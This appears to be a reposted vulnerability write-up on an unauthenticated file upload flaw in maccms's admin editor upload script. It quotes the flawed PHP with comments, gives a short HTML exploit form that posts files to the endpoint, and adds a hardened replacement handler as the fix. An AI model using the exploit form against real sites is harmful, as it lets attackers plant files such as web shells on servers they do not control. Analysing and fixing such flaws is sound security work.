
maccms: a marginal upload vulnerability and its fix

A small program; I happened to come across it and took a look while I was there.

./admin/editor/upload.php

    <?php
    require_once ("admin_conn.php");
    $action=be("get","action");
    $ftypes=array('jpg','gif','bmp','png',".jpeg");
    $upfileDir= "". $_SESSION["upfolder"] . "/" . getSavePicPath() . "/";
    $maxSize=1000;
    if(!file_exists($upfileDir)){
        mkdir($upfileDir);
    }
    foreach($_FILES as $FILEa){
        if(!in_array(substr($FILEa['name'],-3,3),$ftypes))
            $errm = "文件格式不正确1 [ <a href=# onclick=history.go(-1)>重新上传</a> ]"; // "wrong file format": only stores the message in a variable; no showmsg and exit...
        if($FILEa['size']> $maxSize*1024)
            $errm = "文件大小超过了限制 [ <a onclick=history.go(-1)>重新上传</a> ]"; // "file size exceeds the limit"
        if($FILEa['error'] !=0)
            $errm = "未知错误"; // "unknown error"

        $targetDir= "". $_SESSION["upfolder"] . "/" . getSavePicPath() . "/"; // not logged in, so session=null...
        $targetFile=date('Ymd').time().substr($FILEa['name'],-4,4);
        $realFile=$targetDir.$targetFile;

        if(function_exists('move_uploaded_file')){
            move_uploaded_file($FILEa['tmp_name'],$realFile); // move the uploaded file
            if(app_watermark==1){
                imageWaterMark($targetDir.$targetFile,app_waterlocation,app_waterfont);
            }
            if($action=="xht"){
                echo "{'err':'".$errm."','msg':'".app_installdir. replaceStr($upfileDir,"","").$targetFile."'}";
            }
            else{ // isn't it a bit late to die only now?
                die("<script>parent.document.getElementById('pic').value='".replaceStr($upfileDir,"","").$targetFile."'</script>");
            }
        }
        else{
            @copy($FILEa['tmp_name'],$realFile); // same as above
            if(app_watermark==1){
                imageWaterMark($targetDir.$targetFile,app_waterlocation,app_waterfont);
            }
            if($action=="xht"){
                echo "{'err':'".$errm."','msg':'".app_installdir. replaceStr($upfileDir,"","").$targetFile."'}";
            }
            else{
                die("<script>parent.document.getElementById('pic').value='".replaceStr($upfileDir,"","").$targetFile."'</script>");
            }
        }
    }

Why call it marginal? Because ./admin/index.php contains the following check, which pops up a warning telling the administrator to rename the admin folder to avoid being attacked:

    if(cururl.indexOf("/admin/") >0){alert('请将文件夹admin改名,避免被 黑客 入侵攻击');}

So I searched, and most sites (90%++) have changed the admin path, which is what makes this one marginal.

exp

    <body leftmargin=0 topmargin=0 style="font-size:11px">
    <form name="form" enctype="multipart/form-data" action="http://www.2cto.com /www/mcms/admin/editor/upload.php" method="post">
    <input type=file name=file1>
    <input type=submit name=submit value="上传">
    </form>

After uploading, just view the page source.

Author: http://www.90sec.org/thread-1727-1-1.html

Fix provided by www.2cto.com: refer to the code analysis above; in general, do not leave the admin backend at its default path.
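The defects the code comments point out (validation results stored in $errm but never enforced, no login check before the file is written) can be closed in the handler itself. The following is an added example, not maccms code and not part of the original post; the function names save_upload() and upload_error() are hypothetical, it assumes $_SESSION["upfolder"] is only set after an administrator logs in, and it leaves out the project's getSavePicPath() and watermark calls.

```php
<?php
// Added example (not maccms code): hardened handling of uploaded files.
// Assumption: $_SESSION["upfolder"] is set only after admin login.
// save_upload() and upload_error() are hypothetical names.
session_start();

const ALLOWED_EXT = ['jpg', 'jpeg', 'gif', 'bmp', 'png'];
const MAX_BYTES   = 1000 * 1024;

function upload_error(string $msg): void {
    // Unlike the original $errm assignment, stop before anything is written.
    http_response_code(400);
    exit(json_encode(['err' => $msg, 'msg' => '']));
}

function save_upload(array $file, string $baseDir): string {
    if ($file['error'] !== UPLOAD_ERR_OK) upload_error('upload failed');
    if ($file['size'] > MAX_BYTES)        upload_error('file too large');

    // Compare the whole extension, not the last three characters of the name.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) upload_error('file type not allowed');

    // The content must actually parse as an image.
    if (@getimagesize($file['tmp_name']) === false) upload_error('not an image');

    if (!is_dir($baseDir) && !mkdir($baseDir, 0755, true)) upload_error('storage error');

    // Server-chosen name; only the validated extension comes from the client.
    $name = date('Ymd') . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $baseDir . $name)) {
        upload_error('storage error');
    }
    return $name;
}

// Reject unauthenticated requests before touching $_FILES.
if (empty($_SESSION['upfolder'])) {
    http_response_code(403);
    exit('login required');
}
$dir = rtrim($_SESSION['upfolder'], '/') . '/';
foreach ($_FILES as $f) {
    echo json_encode(['err' => '', 'msg' => save_upload($f, $dir)]);
}
```

Configuring the web server so the upload directory never executes scripts is a useful second layer, since it holds even if a check in the handler is later weakened.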
